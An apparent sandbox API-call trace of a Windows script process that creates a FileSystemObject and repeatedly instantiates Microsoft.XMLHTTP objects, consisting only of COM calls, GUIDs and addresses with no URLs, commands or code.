	[0505.590] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0505.590] ??2@YAPEAX_K@Z () returned 0x62f350
	[0505.590] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0505.590] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0505.590] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0505.590] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0505.590] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0505.590] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0505.590] SysStringLen (param_1=0x0) returned 0x0
	[0505.590] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0505.594] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0505.594] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0505.594] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0505.594] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0505.594] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0505.594] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0509.943] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0509.943] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0509.943] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0509.946] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0509.946] SysStringLen (param_1=0x0) returned 0x0
	[0509.946] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0509.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0509.947] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0509.947] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0509.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0509.947] ??2@YAPEAX_K@Z () returned 0x62f310
	[0509.947] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0509.947] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0509.947] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0509.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0509.947] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0509.947] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0509.947] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0509.950] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0509.950] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0509.950] SysStringLen (param_1=0x0) returned 0x0
	[0509.950] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0509.950] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0509.950] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0509.950] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0509.950] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5ba8) returned 0x0
	[0509.950] ??2@YAPEAX_K@Z () returned 0x62f330
	[0509.950] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5ba8, pUnkSite=0x62f330) 
	[0509.950] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0509.951] XMLHTTPRequest:IUnknown:Release (This=0x49c5ba8) returned 0x0
	[0509.951] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0509.951] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0509.951] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0509.951] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0509.951] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0509.951] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0509.951] SysStringLen (param_1=0x0) returned 0x0
	[0509.951] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0509.951] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0509.951] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0509.952] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0509.952] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0509.952] ??2@YAPEAX_K@Z () returned 0x62f310
	[0509.952] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0509.952] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0509.952] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0509.952] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0509.952] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0509.952] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0509.952] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0509.952] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0509.952] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0509.952] SysStringLen (param_1=0x0) returned 0x0
	[0509.953] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0509.953] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0509.953] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0509.953] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0509.953] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7568) returned 0x0
	[0509.953] ??2@YAPEAX_K@Z () returned 0x62f330
	[0509.953] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7568, pUnkSite=0x62f330) 
	[0509.953] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0509.953] XMLHTTPRequest:IUnknown:Release (This=0x49c7568) returned 0x0
	[0509.953] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0509.953] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0509.953] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0509.953] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0509.953] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0509.954] longjmp () 
	[0509.954] longjmp () 
	[0509.954] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0509.954] SysStringLen (param_1=0x0) returned 0x0
	[0509.954] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0509.954] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0509.954] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0509.954] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0509.954] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0509.954] ??2@YAPEAX_K@Z () returned 0x62f310
	[0509.954] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0509.954] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0509.954] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0509.954] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0509.954] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0509.955] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0509.955] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0509.955] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0509.955] longjmp () 
	[0509.955] longjmp () 
	[0509.955] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0509.955] SysStringLen (param_1=0x0) returned 0x0
